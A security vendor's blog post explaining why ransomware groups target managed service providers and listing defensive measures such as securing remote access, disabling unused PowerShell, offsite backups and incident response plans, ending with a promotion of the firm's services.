Chris Swagler | December 20th, 2022

Managed service providers (MSPs), who are charged with providing IT security services to clients, have found themselves in the sights of ransomware groups. These threat actors increasingly target the MSP industry, where breaching a single client can allow threat actors to deploy ransomware to dozens of companies. Protecting against this can become a significant challenge for MSPs; however, it also can be an opportunity. MSPs can better defend themselves and their clients by prioritizing internal security protocols. Additionally, it allows security-conscious MSPs to distinguish themselves from competitors who can be more vulnerable to compromise. We’ll look deeper at why ransomware groups are targeting MSPs and examine effective ways for mitigating ransomware attacks.

Threat operators can obtain direct access to clients through an MSP’s infrastructure and then move easily between them and their clients’ shared networks by utilizing the legitimate credentials of compromised MSPs. From there, ransomware can be deployed with minimum effort. According to the Department of Homeland Security, MSPs often have direct and unrestricted access to their clients’ networks and can store clients’ data on their own internal infrastructure. MSPs can obtain significant economies of scale by servicing numerous clients. A compromise in one part of the network, therefore, can spread globally, impacting other clients and adding risk.

MSPs are frequently much smaller than the companies they serve and 65% of MSPs have fewer than 10 full-time employees. Smaller MSPs often have fewer resources, fewer dedicated security personnel, and are frequently lacking the time to maintain strict cybersecurity policies. MSPs can be easier targets than larger companies, while providing threat operators with access to thousands of endpoints.

Adhering to proven cybersecurity practices can help secure both internal environments and clients’ endpoints. The following ideas aren’t comprehensive, but rather a compilation of ways to mitigate ransomware.

Ensure Remote Access Tools are Secured

Making remote access tools as safe as possible is one of the most effective things MSPs can do to mitigate ransomware. This can include:

Restrict Network Access

Ransomware attacks on MSPs usually entail the exploitation of stolen credentials. MSPs need to operate with the assumption that their accounts will be compromised at some point and take appropriate steps to restrict network access.

Disable PowerShell If Not Being Used

PowerShell is Microsoft’s built-in task automation and configuration management framework. Even though PowerShell has numerous legitimate purposes, threat actors frequently use it to deliver ransomware because it can execute macros, grant full access to numerous Windows system functions, and execute payloads from memory. If PowerShell is not important to operations, MSPs should disable it. MSPs that must use PowerShell need to closely monitor all PowerShell activities to identify and terminate suspicious behavior.

Secure All Endpoints

Even though ransomware can be spread in various ways, numerous attacks start the old-fashioned way with users being deceived by malicious emails. There are several ways MSPs can protect their employees:

Maintain Offsite Backups

Any ransomware mitigation approach needs to include an effective backup system. It’s critical for MSPs to realize that if threat operators have compromised their RMM software, they will likely have access to MSPs’ backups. If threat operators can delete backups and gain an advantage, they will do so. Additionally, some ransomware strains are designed to encrypt local and cloud backups. The most straightforward and successful method of developing ransomware-proof backups is to follow the 3-2-1 rule, which states the MSPs need to:

Have BYOD Policies

Cloud-based tools are common in MSPs’ environments, however, any device used to access corporate resources needs to be considered a potential security risk. MSPs need to ensure that all company-issued devices used for work purposes are secured properly and develop policies for employees who work remotely using personal devices. Restricting network access, requiring VPN usage, installing device encryption, and mandating MFA can assist MSPs in securing BYOD devices and lowering the risk of compromise.

Create and Test Incident Response Plans

MSPs can do everything right and still experience ransomware attacks. When incidents occur, it’s critical for MSPs to have a plan in place to respond quickly and effectively.

MSPs’ security is directly linked to their clients. If MSPs are compromised, it’s likely that their clients will follow, resulting in severe downtime and ransom demands. Companies put enormous trust in MSPs and it’s important they fulfill this trust by doing everything possible to reduce the risk of ransomware incidents. A proactive security strategy allows MSPs to gain a competitive advantage as cybersecurity becomes a more critical company consideration across industries. Additionally, it’s important for MSPs and their clients to always remain alert of the current threat landscape and follow the mitigation process mentioned above to reduce the risk of potential ransomware attacks. At SpearTip, MSPs can upsell their security offerings by incorporating our pre-breach. Risk services into their current catalog. We offer our integrable cybersecurity solution which allows MSPs to focus on their clients’ core IT objectives while providing industry-leading protection against malicious ransomware threats. Our certified engineers respond to thousands of security incidents to improve clients’ operational, procedural, and technical control gaps based on security standards.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.